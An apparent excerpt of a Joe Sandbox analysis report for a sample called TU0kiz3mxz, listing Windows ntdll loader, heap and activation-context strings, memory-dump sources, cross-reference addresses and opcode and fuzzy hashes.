                                                                                                                      Strings
                                                                                                                      • HandleTraces, xrefs: 01148C8F
                                                                                                                      • VerifierDlls, xrefs: 01148CBD
                                                                                                                      • VerifierDebug, xrefs: 01148CA5
                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01148B8F
                                                                                                                      • VerifierFlags, xrefs: 01148C50
                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                      • API String ID: 0-3223716464
                                                                                                                      • Opcode ID: 6ab3ec537347e3e4dbf5fe5fa886950ec54ff5d8b06f08df649226eb43e98a0b
                                                                                                                      • Instruction ID: 0a62a1d83cb1d3aa0c5288f87f17379eec03100a8d5c4ecb9a8bd747b1618da1
                                                                                                                      • Opcode Fuzzy Hash: 6ab3ec537347e3e4dbf5fe5fa886950ec54ff5d8b06f08df649226eb43e98a0b
                                                                                                                      • Instruction Fuzzy Hash: 5C9147B1A06306EFD72EEFA8C8C0B9B7BE5AB55F18F050468FA816B241C7709C41C795
Strings
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
Strings
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
Strings
• LdrpInitShimEngine, xrefs: 011199F4, 01119A07, 01119A30
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01119A2A
• apphelp.dll, xrefs: 010B6496
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 01119A01
• minkernel\ntdll\ldrinit.c, xrefs: 01119A11, 01119A3A
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011199ED
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-204845295
Strings
• SXS: %s() passed the empty activation context, xrefs: 01132165
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01132180
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01132178
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0113219F
• RtlGetAssemblyStorageRoot, xrefs: 01132160, 0113219A, 011321BA
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011321BF
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 01138181, 011381F5
• Loading import redirection DLL: '%wZ', xrefs: 01138170
• LdrpInitializeImportRedirection, xrefs: 01138177, 011381EB
• Unable to build import redirection Table, Status = 0x%x, xrefs: 011381E5
• minkernel\ntdll\ldrinit.c, xrefs: 010FC6C3
• LdrpInitializeProcess, xrefs: 010FC6C4
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
• API String ID: 0-475462383
APIs
  • Part of subcall function 01102DF0: LdrInitializeThunk.NTDLL ref: 01102DFA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BA3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100BB6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D60
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01100D74
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
• String ID:
• API String ID: 1404860816-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_TU0kiz3mxz.jbxd
Yara matches
Similarity
• API ID:
• String ID: C$a$b$d$i
• API String ID: 0-2334916691
Strings
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
• API String ID: 0-379654539
Strings
• @, xrefs: 010F8591
• \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 010F855E
• minkernel\ntdll\ldrinit.c, xrefs: 010F8421
• LdrpInitializeProcess, xrefs: 010F8422
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
• API String ID: 0-1918872054
Strings
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011322B6
• SXS: %s() passed the empty activation context, xrefs: 011321DE
• .Local, xrefs: 010F28D8
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011321D9, 011322B1
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
Strings
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01133437
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 0113342A
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01133456
• RtlDeactivateActivationContext, xrefs: 01133425, 01133432, 01133451
Memory Dump Source
• Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
                                                                                                                      Strings
                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0112106B
                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011210AE
                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01121028
                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01120FE5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                      • API String ID: 0-1468400865
                                                                                                                      • Opcode ID: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                                                                                      • Instruction ID: 6e3dbe82ba4a9379c3cbbce05b2c7fcc2059d1d3c243e9333404edaf7d2a3cda
                                                                                                                      • Opcode Fuzzy Hash: 9d2e511d342a63bc58eae4f9d741013042c613888e6659698b0a609b11b1aa62
                                                                                                                      • Instruction Fuzzy Hash: E071C1719043059FCB21DF18C884F9B7BA8AFA4B54F10056CF9888B286D775D589CFD2
                                                                                                                      Strings
                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0113362F
                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 0113365C
                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01133640, 0113366C
                                                                                                                      • LdrpFindDllActivationContext, xrefs: 01133636, 01133662
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                      • API String ID: 0-3779518884
                                                                                                                      • Opcode ID: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                                                                                                      • Instruction ID: eb2de068767d90bd52a923a3454bcee08583103061ea069206cc4e17b795195d
                                                                                                                      • Opcode Fuzzy Hash: 8e7be0e1cc91367a389f058372312d35368b30c27aa57d77747f33e2a837b632
                                                                                                                      • Instruction Fuzzy Hash: 75312C329006119EEF3ABB0CC88BB6776E4BB01654F0A81ADDFD4D7AD1D7A09CC08795
                                                                                                                      Strings
                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0112A992
                                                                                                                      • LdrpDynamicShimModule, xrefs: 0112A998
                                                                                                                      • apphelp.dll, xrefs: 010E2462
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0112A9A2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-176724104
                                                                                                                      • Opcode ID: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                                                                                      • Instruction ID: 1c5ca71988d748b52b917a07663a39288ea535c53b8989a5c6cb1e12b6f24173
                                                                                                                      • Opcode Fuzzy Hash: abf13d0506d4542c5818e2afaebcb7bdded9b1d115369c55b80988baf2a324bf
                                                                                                                      • Instruction Fuzzy Hash: C6316AB5B00312ABDB3D9F5AE8C5AAA7BB9FF84B04F150039E960A7244D77058D1CB40
                                                                                                                      Strings
                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 010D327D
                                                                                                                      • HEAP: , xrefs: 010D3264
                                                                                                                      • HEAP[%wZ]: , xrefs: 010D3255
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                      • API String ID: 0-617086771
                                                                                                                      • Opcode ID: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                                                                                      • Instruction ID: 475ed4feeeba332068d94cd1781b20629714955c81ecaef2b9f86ab9743b526f
                                                                                                                      • Opcode Fuzzy Hash: 13e93c56e872e506947de913ecb2ef77dbf8ae47d3aa2ee3fca83a7311b9fca0
                                                                                                                      • Instruction Fuzzy Hash: 8392BA71A043499FDB29CF68C440BAEBBF1FF48314F1880A9E999AB391D735A941CF51
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-4253913091
                                                                                                                      • Opcode ID: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                                                                                      • Instruction ID: 99100de74a788c03772876d0d40a2bdfc7f790d6981f5bf6684758563e397acd
                                                                                                                      • Opcode Fuzzy Hash: a9e753c644568c3631785d50caeca364d54b6d9ee0ebba7f07a6e9d39ea0238e
                                                                                                                      • Instruction Fuzzy Hash: 31F1AF70A00606DFEB19CF68C894BAEB7F6FF45304F1481A8E59A9B385D734E981CB51
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: $@
                                                                                                                      • API String ID: 2994545307-1077428164
                                                                                                                      • Opcode ID: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                                                                                      • Instruction ID: 52e4931020aabdec7165356128bde71e178995303650eef2eae0c0729f136ea3
                                                                                                                      • Opcode Fuzzy Hash: b35ee1ce680b83d4978cd57b717eefa04885b759fa053bb272732494fa6494ed
                                                                                                                      • Instruction Fuzzy Hash: FFC29F716083519FDB69CF29C844BAFBBE5AF88704F04892DFAC987241D775D844CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      • API String ID: 0-2779062949
                                                                                                                      • Opcode ID: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                                                                                      • Instruction ID: 2d864cebcfe6f4160263d437f8f11a5fc63a3424430284e06413e83bd80f5e33
                                                                                                                      • Opcode Fuzzy Hash: 011ced80e5b360036e3050f047e31221db798b0484ff6b2d64328ccc83c80db2
                                                                                                                      • Instruction Fuzzy Hash: F1A16B719556299BDB35EF68CC88BEAF7B8EF48700F1001E9E909A7250D7359E84CF90
                                                                                                                      Strings
                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0112A10F
                                                                                                                      • LdrpCheckModule, xrefs: 0112A117
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0112A121
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-161242083
                                                                                                                      • Opcode ID: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                                                                                      • Instruction ID: 904566c8b69e316d976c34525813e0f37571152098203e2bc0bb6e2f4cec75f6
                                                                                                                      • Opcode Fuzzy Hash: 6b68fb31109c3b48d174faee371989b98c0e0a43d24efcaf5b2510a830ae88b5
                                                                                                                      • Instruction Fuzzy Hash: 1971FF70A0030A9FDB29EF69C984AAEB7F4FF44704F14447DE992AB605E374A991CB40
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-1334570610
                                                                                                                      • Opcode ID: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                                                                                      • Instruction ID: ca6bb4458fa4b1531834fbf30c01973d007c1d70096f737b70df047d46f21856
                                                                                                                      • Opcode Fuzzy Hash: 88ce4003f702e37c04983e954164b010aaef685e649ec9f06a7a7aa3ff0ba223
                                                                                                                      • Instruction Fuzzy Hash: 6661B070604301DFDB69CF28C484BAABBE2FF45714F148599F4998F296D770E891CB91
                                                                                                                      Strings
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 011382D7
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 011382E8
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 011382DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1783798831
                                                                                                                      • Opcode ID: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                                                                                      • Instruction ID: 568623773298b4247406192f69ae01e7b12bb89c63f8b6846575928830609e07
                                                                                                                      • Opcode Fuzzy Hash: 201ae57f9ceac6efd3b90d545b2d92d729c4966fa717ddb14e6bb246f6ad1bbb
                                                                                                                      • Instruction Fuzzy Hash: 5F4120B1504309ABD728EB69D986F9B77E8BF58710F00493EFA94D7290E770D840CB91
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0117C1F1
                                                                                                                      • PreferredUILanguages, xrefs: 0117C212
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0117C1C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      • API String ID: 0-2968386058
                                                                                                                      • Opcode ID: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                                                                                      • Instruction ID: e1ab0fdb7325ed18f4a15093bf5b3f9bf81291367bc537749ab778e8c461bd67
                                                                                                                      • Opcode Fuzzy Hash: 367afed0eff1d542839cc62abc7d2e971bfe1516b50a31c45c2b3ce9c8bdbb00
                                                                                                                      • Instruction Fuzzy Hash: 4B415671E0020AEBDF19DFD8C855FEEB7B9AB54704F14416AE605F7280D7749A44CB90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      • API String ID: 0-1373925480
Strings
• minkernel\ntdll\ldrredirect.c, xrefs: 01144899
• LdrpCheckRedirection, xrefs: 0114488F
• Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01144888
Similarity
• API ID:
• String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
• API String ID: 0-3154609507
Strings
Similarity
• API ID:
• String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-2558761708
Strings
• Process initialization failed with status 0x%08lx, xrefs: 011420F3
• LdrpInitializationFailure, xrefs: 011420FA
• minkernel\ntdll\ldrinit.c, xrefs: 01142104
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
APIs
Strings
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
Strings
• LdrResSearchResource Exit, xrefs: 010CAA25
• LdrResSearchResource Enter, xrefs: 010CAA13
Similarity
• API ID:
• String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
• API String ID: 0-4066393604
Strings
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
Strings
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
Strings
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
Strings
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
• kLsE, xrefs: 010C0540
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
Strings
• RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
• RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
Strings
Similarity
• API ID: InitializeThunk
• String ID: Cleanup Group$Threadpool!
• API String ID: 2994545307-4008356553
Strings
Similarity
• API ID:
• String ID: MUI
• API String ID: 0-1339004836
Strings
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
Strings
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      • Opcode ID: 9ef3b291d18ceeaabb86a9d1eb4e62f31a6ec81bc9e5f23fb3fe1452fa373ee7
                                                                                                                      • Instruction ID: 9f8efd8473782b6ea7cabff0f265f7f4bb813e642570d9ac22ee0ddc6910a648
                                                                                                                      • Opcode Fuzzy Hash: 9ef3b291d18ceeaabb86a9d1eb4e62f31a6ec81bc9e5f23fb3fe1452fa373ee7
                                                                                                                      • Instruction Fuzzy Hash: CC91C075A02209AEDB2AEBA5CC44FEFBB7EEF44740F010129F600A7250DB769911CB91
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: GlobalTags
                                                                                                                      • API String ID: 0-1106856819
                                                                                                                      • Opcode ID: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                                                                                      • Instruction ID: 068b7e40d782b0a0ce528654d2d9a4e41f57be906b070bdb23065eb56af48c9b
                                                                                                                      • Opcode Fuzzy Hash: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                                                                                      • Instruction Fuzzy Hash: 8B716BB5E0060AEFDF2DCF98C5906EDBBB1BF88714F14816EE945A7248E7718A41CB50
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: .mui
                                                                                                                      • API String ID: 0-1199573805
                                                                                                                      • Opcode ID: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                                                                                      • Instruction ID: 530743610de6527435fff42546c47304aeaafebd81fb3ce5deb9c7cfd51f2ef1
                                                                                                                      • Opcode Fuzzy Hash: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                                                                                      • Instruction Fuzzy Hash: DF51B872D0022A9BDF19DF99D840AEEBBB8EF04A54F054129E951BB640D3359C11CBE4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_3_2_1090000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EXT-
                                                                                                                      • API String ID: 0-1948896318
                                                                                                                      • Opcode ID: 052495e17f7b3c044cc8314b616fd4d6129037aec3bb99ce23510da8969668b5
                                                                                                                      • Instruction ID: 0e034d2609850371c04ccc16610476c6982592adc1eee09f968fc0c59a4f6d7a
